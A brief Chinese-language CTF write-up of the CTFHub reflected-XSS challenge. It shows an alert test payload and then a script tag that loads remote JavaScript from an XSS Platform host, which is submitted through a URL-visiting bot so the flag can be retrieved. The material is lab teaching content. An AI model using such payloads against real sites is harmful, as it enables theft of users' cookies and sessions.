查看页面:

【CTFHub 技能树】反射型XSS

第一个输入框与下面Hello后的内容相同,猜测可以通过该输入,改变页面内容。

进行测试:

<script>alert(1)</script>

【CTFHub 技能树】反射型XSS

默认使用get方式发送Payload,成功弹窗。

经过测试,第二个输入框输入URL时,返回SUCCESS,猜测在后台进行访问。

尝试使用XSS Platform,在第一个框中输入 包含脚本 网址:<script src=//0xs.co/YGlQP></script>

通过第二个框,访问包含了XSS脚本的本页面URL:

【CTFHub 技能树】反射型XSS

于平台获得FLAG。

【CTFHub 技能树】反射型XSS

相关文章:

  • 2021-10-26
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-06-14
  • 2022-02-06
  • 2022-12-23
猜你喜欢
  • 2022-12-23
  • 2021-05-12
  • 2021-09-14
  • 2021-04-23
  • 2021-11-13
  • 2022-12-23
相关资源
相似解决方案